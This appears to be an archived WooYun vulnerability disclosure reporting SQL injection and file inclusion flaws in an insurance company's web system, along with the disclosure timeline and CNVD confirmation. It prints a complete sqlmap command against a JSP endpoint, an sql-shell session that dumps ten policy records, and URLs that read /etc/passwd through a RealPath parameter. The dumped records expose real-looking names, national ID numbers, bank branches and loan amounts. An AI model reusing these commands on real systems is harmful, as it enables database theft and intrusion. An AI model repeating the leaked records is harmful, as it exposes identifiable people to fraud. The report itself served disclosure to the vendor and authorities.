乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-01: 细节已通知厂商并且等待厂商处理中 2015-12-04: 厂商已经确认,细节仅向厂商公开 2015-12-14: 细节向核心白帽子及相关领域专家公开 2015-12-24: 细节向普通白帽子公开 2016-01-03: 细节向实习白帽子公开 2016-01-18: 细节向公众公开
sql注入漏洞、文件包含
python SQLMap/SQLMap.py -u "http://**.**.**.**/ui/common/cvar/CExec.jsp" --data "txtVarData=328044&txtOther=328044&txtFrameName=328044&txtSQL=328044&startIndex=328044&txtQueryResult=328044&mOperate=328044&txtCodeCondition=328044&txtConditionField=328044&txtShowWidth=328044&txtCodeName=328044" -p txtCodeCondition --risk 3 --level 3 --current-db --dbms oracle
227张表
qlccont表6000万数据
前10行
[13:53:18] [INFO] the back-end DBMS is Oracleweb application technology: Servlet 2.5, JSP, JSP 2.1back-end DBMS: Oracle[13:53:18] [INFO] calling Oracle shell. To quit type 'x' or 'q' and press ENTERsql-shell> select count(*) from QLCCONT[13:53:38] [INFO] fetching SQL SELECT statement query output: 'select count(*) from QLCCONT'[13:53:42] [WARNING] reflective value(s) found and filtering outselect count(*) from QLCCONT: '60205154'sql-shell> select count(*) from QLCCONT where rownum <11[13:54:26] [INFO] fetching SQL SELECT statement query output: 'select count(*) from QLCCONT where rownum <11'select count(*) from QLCCONT where rownum <11: '10'sql-shell> select * from QLCCONT where rownum <11[13:54:33] [INFO] fetching SQL SELECT statement query output: 'select * from QLCCONT where rownum <11'[13:54:33] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself[13:54:33] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns[13:54:33] [INFO] fetching current database[13:54:33] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes[13:54:33] [INFO] fetching columns for table 'QLCCONT' in database 'LISAIR'[13:54:33] [INFO] the query with expanded column name(s) is: SELECT AGENTCODE, AGENTCOM, AGENTCOMNAME, AGENTNAME, AMNT, APPNTIDNO, APPNTIDTYPE, APPNTIDTYPENAME, APPNTNAME, BNFNAME1, BNFNAME2, CINVALIDATE, CONTNO, CVALIDATE, CVALITIME, DATASRC, IDTYPENAME, INSUDAYS, INSUFLAG, INSUREDIDNO, INSUREDIDTYPE, INSUREDNAME, INSUREMARK, JOURNEYDATE, JOURNEYNO, JOURNEYTIME, MAKEDATE, MAKETIME, MANAGECOM, MANAGECOMNAME, MODIFYDATE, MODIFYTIME, PAYINTV, PEOPLES2, PREM, PRTNO, REMARK, RISKCODE, RISKNAME, RISKTYPE, SERIALNO, SIGNDATE, SIGNTIME, STANDBYFLAG1, STANDBYFLAG10, STANDBYFLAG11, STANDBYFLAG12, STANDBYFLAG13, STANDBYFLAG14, STANDBYFLAG15,STANDBYFLAG2, STANDBYFLAG3, STANDBYFLAG4, STANDBYFLAG5, STANDBYFLAG6, STANDBYFLAG7, STANDBYFLAG8, STANDBYFLAG9, STATE, TBAGENTCOM, TBAGENTCOMNAME, TBDATE, TBOPERATOR, TBOPERATORNAME, TBTIME, TICKETNO, XSOPERATOR, XSOPERATORNAME, YYBCODE, YYBNAME, ZZCODE, ZZNAME FROM QLCCONT WHERE rownum <11select * from QLCCONT where rownum <11 [10]:[*] 346000107, 120000063418019, 宁国市联社甲路信用社, 袁继红, 10000, , , , 凌爱国, 安徽宁国农村合作银行甲路支行, 法定, 2012-04-23 00:00:00, 2011000077959068, 2011-04-23 00:00:00, , LIS, 身份证, 366, D, 342524196111248419, 0, 凌爱国, N, , , , 2011-04-23 00:00:00, 01:04:01, 86341861, 华夏人寿保险股份有限公司宣城中心支公司团险业务部, 2011-04-23 00:00:00, 01:04:01, 0, 1, 30, 12288000073780, ,211610, 华夏借款人意外伤害保险, 小额信贷, B000000000976905, 2011-04-22 00:00:00, 10:54:31, 3, , , , , , , , , , , , , , , 1, , , 2011-04-22 00:00:00, , , 10:54:31, , , , , , ,[*] 376000041, 120000073709003, 石集信用社, 郭庆荣, 30000, , , , 李士冬, 山东泰安农信社, 法定, 2011-08-23 00:00:00, 2011000077963068, 2011-04-23 00:00:00, , LIS, 身份证, 122, D, 370921196901015413, 0, 李士冬, N, , , , 2011-04-23 00:00:00, 01:04:01, 86370961, 华夏人寿保险股份有限公司泰安中心支公司团险业务部, 2011-04-23 00:00:00, 01:04:01, 0, 1, 30, 10428000122803, , 211610, 华夏借款人意外伤害保险, 小额信贷, B000000000976906, 2011-04-22 00:00:00, 10:54:50, 3, , , ,, , , , , , , , , , , 1, , , 2011-04-22 00:00:00, , , 10:54:49, , , , , , ,[*] 346000042, 120000113411029, 明光市联社横山信用社, 喻雷, 20000, , , , 蔡家前, 安徽明光农村合作银行横山支行, 法定, 2012-04-23 00:00:00, 2011000077964068, 2011-04-23 00:00:00, , LIS, 身份证, 366, D, 341182197603225614, 0, 蔡家前, N, , , , 2011-04-23 00:00:00, 01:04:01, 86341161, 华夏人寿保险股份有限公司滁州中心支公司团险部, 2011-04-23 00:00:00, 01:04:01, 0, 1, 100, 12288000005410, , 211610, 华夏借款人意外伤害保险, 小额信贷, B000000000976907, 2011-04-22 00:00:00, 10:55:28, 3, , , , , , , , , , , , , , , 1, , , 2011-04-22 00:00:00, , , 10:55:28, , , , , , ,[*] 376000063, 120000013713003, 城北支行, 徐德峰, 100000, , , , 耿佃吉, 山东临沂农信社, 法定, 2011-08-23 00:00:00, 2011000077965068, 2011-04-23 00:00:00, , LIS, 身份证, 122, D, 37280119720919481X, 0, 耿佃吉, N, , , , 2011-04-23 00:00:00, 01:04:01, 86371361, 华夏人寿保险股份有限公司临沂中心支公司团险业务部, 2011-04-23 00:00:00, 01:04:01, 0, 1, 100, 10428000042700, , 211610, 华夏借款人意外伤害保险, 小额信贷, B000000000976908, 2011-04-22 00:00:00, 10:56:30, 3, , , , , , , , , , , , , , , 1, , , 2011-04-22 00:00:00, , , 10:56:30, , , , , , ,[*] 376000063, 110000013713059, 临沭县农村信用合作联社郑山信用社, 徐德峰, 20000, , , , 李守波, 山东临沂农信社, 法定, 2011-07-23 00:00:00, 2011000077904068, 2011-04-23 00:00:00, , LIS, 身份证, 91, D, 372833197704225119, 0, 李守波, N, , , , 2011-04-23 00:00:00, 01:04:01, 86371361, 华夏人寿保险股份有限公司临沂中心支公司团险业务部, 2011-04-23 00:00:00, 01:04:01, 0, 1, 16, 10428000072770, , 211610, 华夏借款人意外伤害保险, 小额信贷, B000000000976873, 2011-04-22 00:00:00, 10:33:01, 3, ,, , , , , , , , , , , , , 1, , , 2011-04-22 00:00:00, , , 10:33:00, , , , , , ,[*] 376000063, 120000023713030, 下古村信用社, 徐德峰, 50000, , , , 王海韦, 山东临沂农信社, 法定, 2012-04-23 00:00:00, 2011000077898068, 2011-04-23 00:00:00, , LIS, 身份证, 366, D, 371323198404016714, 0, 王海韦, N, , , , 2011-04-23 00:00:00, 01:04:01, 86371361, 华夏人寿保险股份有限公司临沂中心支公司团险业务部, 2011-04-23 00:00:00, 01:04:01, 0, 1, 100, 10428000032849, , 211610, 华夏借款人意外伤害保险, 小额信贷, B000000000976874, 2011-04-22 00:00:00, 10:31:59, 3, , , , , , , , , , , , , , , 1, , , 2011-04-22 00:00:00, , , 10:31:58, , , , , , ,[*] 376000063, 120000023713013, 高桥信用社, 徐德峰, 200000, , , , 郝风金, 山东临沂农信社, 法定, 2012-04-23 00:00:00, 2011000077900068, 2011-04-23 00:00:00, , LIS, 身份证, 366, D, 372827196403111714, 0, 郝风金, N, , , , 2011-04-23 00:00:00, 01:04:01, 86371361, 华夏人寿保险股份有限公司临沂中心支公司团险业务部, 2011-04-23 00:00:00, 01:04:01, 0, 1, 400, 10428000034291, , 211610, 华夏借款人意外伤害保险, 小额信贷, B000000000976875, 2011-04-22 00:00:00, 10:32:04, 3, , , , , , , , , , , , , , , 1, , , 2011-04-22 00:00:00, , , 10:32:03, , , , , , ,[*] 346000072, 120000083411021, 滁州市郊联社黄泥信用社, 汪菊林, 45000, , , ,杨玉莉, 滁州皖东银行黄泥支行, 法定, 2012-04-23 00:00:00, 2011000077905068, 2011-04-23 00:00:00, , LIS, 身份证, 366, D, 341103196402223225, 0, 杨玉莉, N, , , , 2011-04-23 00:00:00, 01:04:01, 86341161, 华夏人寿保险股份有限公司滁州中心支公司团险部, 2011-04-23 00:00:00, 01:04:01, 0, 1, 225, 12288000065172, , 211610, 华夏借款人意外伤害保险, 小额信贷, B000000000976876, 2011-04-22 00:00:00, 10:33:34, 3, , , , , , , , , , , , , , , 1, , , 2011-04-22 00:00:00, , , 10:33:34, , , , , , ,[*] 376000055, 120000023709003, 房村, 霍艳, 35000, , , , 赵乐奎, 山东泰安农信社, 法定, 2011-07-23 00:00:00, 2011000077906068, 2011-04-23 00:00:00, , LIS, 身份证, 91, D, 370911197101064470, 0, 赵乐奎, N, , , , 2011-04-23 00:00:00, 01:04:01, 86370961, 华夏人寿保险股份有限公司泰安中心支公司团险业务部, 2011-04-23 00:00:00, 01:04:01, 0, 1, 28, 10428000125368, , 211610, 华夏借款人意外伤害保险,小额信贷, B000000000976877, 2011-04-22 00:00:00, 10:33:13, 3, , , , , , , , , , , , , , , 1, , , 2011-04-22 00:00:00, , , 10:33:13, , , ,, , ,[*] 376000063, 120000013713009, 梅埠支行, 徐德峰, 50000, , , , 钟佑进, 山东临沂农信社, 法定, 2012-04-23 00:00:00, 2011000077907068, 2011-04-23 00:00:00, , LIS, 身份证, 366, D, 372801196409225532, 0, 钟佑进, N, , , , 2011-04-23 00:00:00, 01:04:01, 86371361, 华夏人寿保险股份有限公司临沂中心支公司团险业务部, 2011-04-23 00:00:00, 01:04:01, 0, 1, 100, 0042407, , 211610, 华夏借款人意外伤害保险, 小额信贷, B000000000976878, 2011-04-22 00:00:00, 10:33:29, 3, , , ,, , , , , , , , , , , 1, , , 2011-04-22 00:00:00, , , 10:33:29, , , , , , ,sql-shell>
http://**.**.**.**/ui/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd
http://**.**.**.**/ui/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts
补丁
危害等级:高
漏洞Rank:12
确认时间:2015-12-04 13:54
CNVD确认并复现所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置。
暂无
